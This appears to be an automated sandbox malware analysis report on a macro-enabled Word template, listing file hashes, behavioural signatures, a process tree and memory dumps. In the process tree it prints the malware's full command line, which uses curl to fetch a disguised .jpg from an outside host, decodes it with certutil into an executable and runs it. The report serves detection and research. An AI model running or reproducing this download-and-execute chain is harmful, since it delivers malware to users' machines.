Analysis

  • max time kernel
    120s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    10/04/2024, 10:22

General

  • Target

    383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f.dotm

  • Size

    16KB

  • MD5

    0fb9bb549173482cfe4faa67ac22a960

  • SHA1

    aad49c13d5b80c4b9022889cc9d56bbc04d0f496

  • SHA256

    383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f

  • SHA512

    ff07db920400bb41a62e7da0f4d54a46fd3b2f56a70789b8f9d8868f93784b6468dd656cea7367e14add124db346896d44619fb041d957658bdc298dd06b43e4

  • SSDEEP

    384:tmtNHjUtc6WGaLmrHzVHRQTtxcdV0pjMNJSOTesmB3Dl:qZpG6mrZKpOMp9OTehP

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\383136adaf956f1fab03de8c1064f7b9119b5b656bedda7ce3137bebbb2a920f.dotm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cd C:\Users\Admin\AppData\Local & curl http://www.xmlschemeformat.com/update/2021/Office/OxB36F8GEEC634.jpg -o OxB36F8GEEC634.jpg & certutil -decode OxB36F8GEEC634.jpg Msdllupdate.exe & Msdllupdate.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2484
      • C:\Windows\SysWOW64\certutil.exe
        certutil -decode OxB36F8GEEC634.jpg Msdllupdate.exe
        3⤵
          PID:2648
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        2⤵
          PID:2512

      Network

            MITRE ATT&CK Enterprise v15

            Downloads

            • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

              Filesize

              20KB

              MD5

              371e6518d4fa391adfc8c0b29f6dbce3

              SHA1

              49f6e37c8007c7946f7da7e4179b249656b36eae

              SHA256

              09a8b390641bdcdc89dab63a11d583699e7a47673a0240e2aa5d01500461ea5e

              SHA512

              f7423f489112feca68d974836190b6d547af00b63d29787f55dc42214b76d3173c9c403ec60e117f520b10a9745c7014e1971c69e8a9a57fd08df0248b5aa5be

            • memory/2296-0-0x000000002F1F1000-0x000000002F1F2000-memory.dmp

              Filesize

              4KB

            • memory/2296-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

              Filesize

              64KB

            • memory/2296-2-0x0000000070A9D000-0x0000000070AA8000-memory.dmp

              Filesize

              44KB

            • memory/2296-10-0x0000000004EE0000-0x0000000004FE0000-memory.dmp

              Filesize

              1024KB

            • memory/2296-15-0x0000000004EE0000-0x0000000004FE0000-memory.dmp

              Filesize

              1024KB

            • memory/2296-19-0x0000000004EE0000-0x0000000004FE0000-memory.dmp

              Filesize

              1024KB

            • memory/2296-26-0x0000000070A9D000-0x0000000070AA8000-memory.dmp

              Filesize

              44KB

            • memory/2296-27-0x0000000004EE0000-0x0000000004FE0000-memory.dmp

              Filesize

              1024KB

            • memory/2296-45-0x000000005FFF0000-0x0000000060000000-memory.dmp

              Filesize

              64KB